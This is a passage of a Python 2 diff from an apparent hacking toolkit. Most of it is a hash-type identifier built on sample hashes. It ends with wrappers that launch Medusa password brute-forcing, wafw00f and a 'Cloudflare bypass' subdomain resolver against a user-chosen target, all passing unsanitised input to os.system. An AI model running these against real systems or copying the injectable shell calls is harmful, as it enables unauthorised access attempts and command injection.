hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| 